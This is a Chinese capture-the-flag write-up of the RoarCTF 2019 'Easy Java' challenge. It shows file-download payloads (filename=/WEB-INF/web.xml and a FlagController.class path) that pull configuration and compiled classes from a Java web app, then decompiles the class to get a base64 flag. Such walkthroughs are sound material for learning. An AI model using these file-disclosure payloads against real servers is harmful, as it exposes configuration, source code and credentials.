[RoarCTF 2019]Easy Java

打开题目

 

 

 然后首先查看源代码和消息头，并没有什么额外的收获，于是我尝试sql注入，然后结果也失败了。

然后我点开了help

 

 

 猜测这可能有文件下载漏洞，我尝试payload:

Download?filename={help.docx}

　　结果出乎意料的是

 

 

 于是我尝试用POST方式来进行请求，结果却意外发现可以下载文件。下载了一个help.docx的文件。

 

 

 然后我尝试下载存有web信息的XML文件。payload:

filename=/WEB-INF/web.xml

　　然后得到了

<servlet>
        <servlet-name>FlagController</servlet-name>
        <servlet-class>com.wm.ctf.FlagController</servlet-class>
    </servlet>

 

到这一步其实可以很明显得到答案了。

然后扩充一下知识点来自博文：https://www.cnblogs.com/Cl0ud/p/12177085.html

 WEB-INF主要包含一下文件或目录：
    /WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。
    /WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中
    /WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
    /WEB-INF/src/：源码目录，按照包名结构放置各个java文件。
    /WEB-INF/database.properties：数据库配置文件

 

科普：servlet：Servlet（Server Applet）是Java Servlet的简称，称为小服务程序或服务连接器，用Java编写的服务器端程序，具有独立于平台和协议的特性，主要功能在于交互式地浏览和生成数据，生成动态Web内容。（来源百度百科）

其实说明了这个就是JAVA源代码进行编译后所产生的后缀带有.class的东西。于是我们可以下载这个.class文件再利用反编译手段来获得flag。

最终payload:

filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(
   name = "FlagController"
)
public class FlagController extends HttpServlet {

   String flag = "ZmxhZ3thNTkzMTBiMy1lZjkzLTQ5ODktOTVlMC0zYTQ2ZmZhMThiYjh9Cg==";


   protected void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
      PrintWriter var3 = var2.getWriter();
      var3.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
   }
}

然后base64解码（在线java反编译网站http://javare.cn/）

注意：要把com到FlagController前面的.改成/，原本的' . '是与文件路径就是类似于java里面一样，就比如说，我要运行hello包里面的hello就是hello.hello